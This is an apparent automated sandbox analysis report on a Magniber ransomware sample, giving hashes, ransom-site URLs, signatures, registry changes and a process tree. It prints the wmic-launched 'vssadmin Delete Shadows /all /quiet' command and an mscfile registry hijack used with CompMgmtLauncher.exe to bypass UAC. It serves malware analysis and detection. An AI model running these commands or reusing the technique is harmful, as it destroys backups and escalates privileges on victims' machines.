Analysis
-
max time kernel
101s -
max time network
131s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
18-08-2021 21:12
Static task
static1
Behavioral task
behavioral1
Sample
3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe
Resource
win10v20210410
General
-
Target
3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe
-
Size
22KB
-
MD5
8cd81ae69ade058076263addc8dd3ebb
-
SHA1
362eb81ecac33897d4dd2a3f175efaaf0fe2c2f5
-
SHA256
3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3
-
SHA512
6170bc3191b8d88043b5c7799c17338f4717af087fa4524141955d2e6cfb0cb468262bcc5c466fe39adfbc534796a79e06d84894ae9f7911b2353460580dac21
Malware Config
Extracted
C:\Users\Admin\Desktop\readme.txt
magniber
http://2834c0381ed008e06qwfekni.n5fnrf4l7bdjhelx.onion/qwfekni
http://2834c0381ed008e06qwfekni.perages.cyou/qwfekni
http://2834c0381ed008e06qwfekni.aimdrop.fit/qwfekni
http://2834c0381ed008e06qwfekni.soblack.xyz/qwfekni
http://2834c0381ed008e06qwfekni.sixsees.club/qwfekni
Signatures
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 8 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1300 2028 cmd.exe 44 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2024 2028 cmd.exe 44 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 784 2028 cmd.exe 44 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 304 2028 cmd.exe 44 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2024 2028 vssadmin.exe 44 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1816 2028 vssadmin.exe 44 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1100 2028 vssadmin.exe 44 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1888 2028 vssadmin.exe 44 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\ConvertFromExport.raw => C:\Users\Admin\Pictures\ConvertFromExport.raw.qwfekni Dwm.exe File renamed C:\Users\Admin\Pictures\FormatHide.raw => C:\Users\Admin\Pictures\FormatHide.raw.qwfekni Dwm.exe File renamed C:\Users\Admin\Pictures\SplitInstall.crw => C:\Users\Admin\Pictures\SplitInstall.crw.qwfekni Dwm.exe File renamed C:\Users\Admin\Pictures\MergeShow.tif => C:\Users\Admin\Pictures\MergeShow.tif.qwfekni Dwm.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2024 set thread context of 1124 2024 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe 13 PID 2024 set thread context of 1224 2024 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe 12 PID 2024 set thread context of 1260 2024 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe 11 -
Interacts with shadow copies 2 TTPs 4 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2024 vssadmin.exe 1816 vssadmin.exe 1100 vssadmin.exe 1888 vssadmin.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 2045e1677594d701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000afe5b2f334402f45af9416b6043b9bf90000000002000000000010660000000100002000000083ce39ebee1c4e5a27cd63e9cabb89772a2fa486dba66493c553eeddf09cf457000000000e8000000002000020000000be8e57abdd2b72274f546583ff1a801e8dd254815c2fd04204ffdfb10a820e8a900000001c60bf413e0f64b22061463f6366265156ea6ab1e268a9ce1fd7ad6414f3862c256a7958823d233d756ec35ea1fb9f48e0a59958d887f9480c5cad1e4fc621fbfdb63a94aabad22386d4a9d4ddb136b1dd31437601fa3986ed954497fe642a7e6994956619f0fb5e13f79e815b9491f2ab9cfc268e03a7e0fafdda2e8d364c376c206f6965323178026cbd7e13a8f98d40000000baff4ae4a381e2dc6a307dad2680d53f50d68a386a8311cd0ea8a9d470b2d5ca5bd4ede6efa81a6d16e049b7f23d30f605c43ce55d197f7041ac31b5bc1488d9 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "336085938" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000afe5b2f334402f45af9416b6043b9bf900000000020000000000106600000001000020000000aa27c9077fb47e84c54e5b205ca2055d60605ab98e8516ec4f6d4777e5fdfc4e000000000e80000000020000200000003c678f9b14343b9f105b9aabf068e9164a48a2c8c4be3de1c838e86e182c41f020000000abab1d9ca1e47db8bac53e02967cbc233c0186bf733c1f964eee5a712c8dbb1d40000000bc1c8abd6b0e73adf528507ea8edf8bf7fe826479af292df3a548bd621b56a03bd5117657d0bc244ed738fed96e397341ab166e5cd317d36bfb5f0c219ad387e iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8F3A7021-0068-11EC-B526-FEC9D8D8C4F3} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe -
Modifies registry class 11 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Dwm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile Dwm.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell Dwm.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open Dwm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command cmd.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" cmd.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command Dwm.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command Explorer.EXE -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1968 notepad.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2024 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe 2024 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 2024 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe 2024 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe 2024 3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1260 Explorer.EXE Token: SeShutdownPrivilege 1260 Explorer.EXE Token: SeIncreaseQuotaPrivilege 1580 WMIC.exe Token: SeSecurityPrivilege 1580 WMIC.exe Token: SeTakeOwnershipPrivilege 1580 WMIC.exe Token: SeLoadDriverPrivilege 1580 WMIC.exe Token: SeSystemProfilePrivilege 1580 WMIC.exe Token: SeSystemtimePrivilege 1580 WMIC.exe Token: SeProfSingleProcessPrivilege 1580 WMIC.exe Token: SeIncBasePriorityPrivilege 1580 WMIC.exe Token: SeCreatePagefilePrivilege 1580 WMIC.exe Token: SeBackupPrivilege 1580 WMIC.exe Token: SeRestorePrivilege 1580 WMIC.exe Token: SeShutdownPrivilege 1580 WMIC.exe Token: SeDebugPrivilege 1580 WMIC.exe Token: SeSystemEnvironmentPrivilege 1580 WMIC.exe Token: SeRemoteShutdownPrivilege 1580 WMIC.exe Token: SeUndockPrivilege 1580 WMIC.exe Token: SeManageVolumePrivilege 1580 WMIC.exe Token: 33 1580 WMIC.exe Token: 34 1580 WMIC.exe Token: 35 1580 WMIC.exe Token: SeShutdownPrivilege 1260 Explorer.EXE Token: SeShutdownPrivilege 1260 Explorer.EXE Token: SeShutdownPrivilege 1260 Explorer.EXE Token: SeIncreaseQuotaPrivilege 636 conhost.exe Token: SeSecurityPrivilege 636 conhost.exe Token: SeTakeOwnershipPrivilege 636 conhost.exe Token: SeLoadDriverPrivilege 636 conhost.exe Token: SeSystemProfilePrivilege 636 conhost.exe Token: SeSystemtimePrivilege 636 conhost.exe Token: SeProfSingleProcessPrivilege 636 conhost.exe Token: SeIncBasePriorityPrivilege 636 conhost.exe Token: SeCreatePagefilePrivilege 636 conhost.exe Token: SeBackupPrivilege 636 conhost.exe Token: SeRestorePrivilege 636 conhost.exe Token: SeShutdownPrivilege 636 conhost.exe Token: SeDebugPrivilege 636 conhost.exe Token: SeSystemEnvironmentPrivilege 636 conhost.exe Token: SeRemoteShutdownPrivilege 636 conhost.exe Token: SeUndockPrivilege 636 conhost.exe Token: SeManageVolumePrivilege 636 conhost.exe Token: 33 636 conhost.exe Token: 34 636 conhost.exe Token: 35 636 conhost.exe Token: SeIncreaseQuotaPrivilege 772 WMIC.exe Token: SeSecurityPrivilege 772 WMIC.exe Token: SeTakeOwnershipPrivilege 772 WMIC.exe Token: SeLoadDriverPrivilege 772 WMIC.exe Token: SeSystemProfilePrivilege 772 WMIC.exe Token: SeSystemtimePrivilege 772 WMIC.exe Token: SeProfSingleProcessPrivilege 772 WMIC.exe Token: SeIncBasePriorityPrivilege 772 WMIC.exe Token: SeCreatePagefilePrivilege 772 WMIC.exe Token: SeBackupPrivilege 772 WMIC.exe Token: SeRestorePrivilege 772 WMIC.exe Token: SeShutdownPrivilege 772 WMIC.exe Token: SeDebugPrivilege 772 WMIC.exe Token: SeSystemEnvironmentPrivilege 772 WMIC.exe Token: SeRemoteShutdownPrivilege 772 WMIC.exe Token: SeUndockPrivilege 772 WMIC.exe Token: SeManageVolumePrivilege 772 WMIC.exe Token: 33 772 WMIC.exe Token: 34 772 WMIC.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 1260 Explorer.EXE 1616 iexplore.exe 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE 1260 Explorer.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1616 iexplore.exe 1616 iexplore.exe 1772 IEXPLORE.EXE 1772 IEXPLORE.EXE 1772 IEXPLORE.EXE 1772 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 61 IoCs
description pid Process procid_target PID 1224 wrote to memory of 1968 1224 Dwm.exe 26 PID 1224 wrote to memory of 1968 1224 Dwm.exe 26 PID 1224 wrote to memory of 1968 1224 Dwm.exe 26 PID 1224 wrote to memory of 1836 1224 Dwm.exe 30 PID 1224 wrote to memory of 1836 1224 Dwm.exe 30 PID 1224 wrote to memory of 1836 1224 Dwm.exe 30 PID 1224 wrote to memory of 1784 1224 Dwm.exe 27 PID 1224 wrote to memory of 1784 1224 Dwm.exe 27 PID 1224 wrote to memory of 1784 1224 Dwm.exe 27 PID 1784 wrote to memory of 1580 1784 cmd.exe 31 PID 1784 wrote to memory of 1580 1784 cmd.exe 31 PID 1784 wrote to memory of 1580 1784 cmd.exe 31 PID 1836 wrote to memory of 1616 1836 cmd.exe 32 PID 1836 wrote to memory of 1616 1836 cmd.exe 32 PID 1836 wrote to memory of 1616 1836 cmd.exe 32 PID 1124 wrote to memory of 1624 1124 taskhost.exe 33 PID 1124 wrote to memory of 1624 1124 taskhost.exe 33 PID 1124 wrote to memory of 1624 1124 taskhost.exe 33 PID 1260 wrote to memory of 520 1260 Explorer.EXE 65 PID 1260 wrote to memory of 520 1260 Explorer.EXE 65 PID 1260 wrote to memory of 520 1260 Explorer.EXE 65 PID 1624 wrote to memory of 636 1624 cmd.exe 62 PID 1624 wrote to memory of 636 1624 cmd.exe 62 PID 1624 wrote to memory of 636 1624 cmd.exe 62 PID 520 wrote to memory of 772 520 wmic.exe 39 PID 520 wrote to memory of 772 520 wmic.exe 39 PID 520 wrote to memory of 772 520 wmic.exe 39 PID 2024 wrote to memory of 1628 2024 cmd.exe 40 PID 2024 wrote to memory of 1628 2024 cmd.exe 40 PID 2024 wrote to memory of 1628 2024 cmd.exe 40 PID 1628 wrote to memory of 1680 1628 cmd.exe 43 PID 1628 wrote to memory of 1680 1628 cmd.exe 43 PID 1628 wrote to memory of 1680 1628 cmd.exe 43 PID 1616 wrote to memory of 1772 1616 iexplore.exe 46 PID 1616 wrote to memory of 1772 1616 iexplore.exe 46 PID 1616 wrote to memory of 1772 1616 iexplore.exe 46 PID 1616 wrote to memory of 1772 1616 iexplore.exe 46 PID 1300 wrote to memory of 2008 1300 cmd.exe 55 PID 1300 wrote to memory of 2008 1300 cmd.exe 55 PID 1300 wrote to memory of 2008 1300 cmd.exe 55 PID 304 wrote to memory of 1668 304 cmd.exe 56 PID 304 wrote to memory of 1668 304 cmd.exe 56 PID 304 wrote to memory of 1668 304 cmd.exe 56 PID 2024 wrote to memory of 1548 2024 vssadmin.exe 57 PID 2024 wrote to memory of 1548 2024 vssadmin.exe 57 PID 2024 wrote to memory of 1548 2024 vssadmin.exe 57 PID 784 wrote to memory of 1652 784 cmd.exe 76 PID 784 wrote to memory of 1652 784 cmd.exe 76 PID 784 wrote to memory of 1652 784 cmd.exe 76 PID 1548 wrote to memory of 684 1548 CompMgmtLauncher.exe 66 PID 1548 wrote to memory of 684 1548 CompMgmtLauncher.exe 66 PID 1548 wrote to memory of 684 1548 CompMgmtLauncher.exe 66 PID 2008 wrote to memory of 820 2008 CompMgmtLauncher.exe 64 PID 2008 wrote to memory of 820 2008 CompMgmtLauncher.exe 64 PID 2008 wrote to memory of 820 2008 CompMgmtLauncher.exe 64 PID 1668 wrote to memory of 520 1668 CompMgmtLauncher.exe 65 PID 1668 wrote to memory of 520 1668 CompMgmtLauncher.exe 65 PID 1668 wrote to memory of 520 1668 CompMgmtLauncher.exe 65 PID 1652 wrote to memory of 1676 1652 sppsvc.exe 59 PID 1652 wrote to memory of 1676 1652 sppsvc.exe 59 PID 1652 wrote to memory of 1676 1652 sppsvc.exe 59
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Users\Admin\AppData\Local\Temp\3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe"C:\Users\Admin\AppData\Local\Temp\3ad0af44a4269c0121eeb19cee197a90b4a7e862b5ce04eab6aafc021dd6e7a3.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2024 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵PID:1680
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵PID:520
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:772
-
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1968
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
-
C:\Windows\system32\cmd.execmd /c "start http://2834c0381ed008e06qwfekni.perages.cyou/qwfekni^&1^&39803775^&70^&347^&12"2⤵
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://2834c0381ed008e06qwfekni.perages.cyou/qwfekni&1&39803775&70&347&123⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1616 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1772
-
-
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵PID:636
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:820
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:684
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵PID:1652
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1676
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:304 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
- Suspicious use of WriteProcessMemory
PID:520
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-800035401159936499210739613732136189843-11730882861985560618-457655950876638901"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:636
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
- Suspicious use of WriteProcessMemory
PID:2024
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1816
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1100
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1888
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe1⤵
- Suspicious use of WriteProcessMemory
PID:1652
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:1484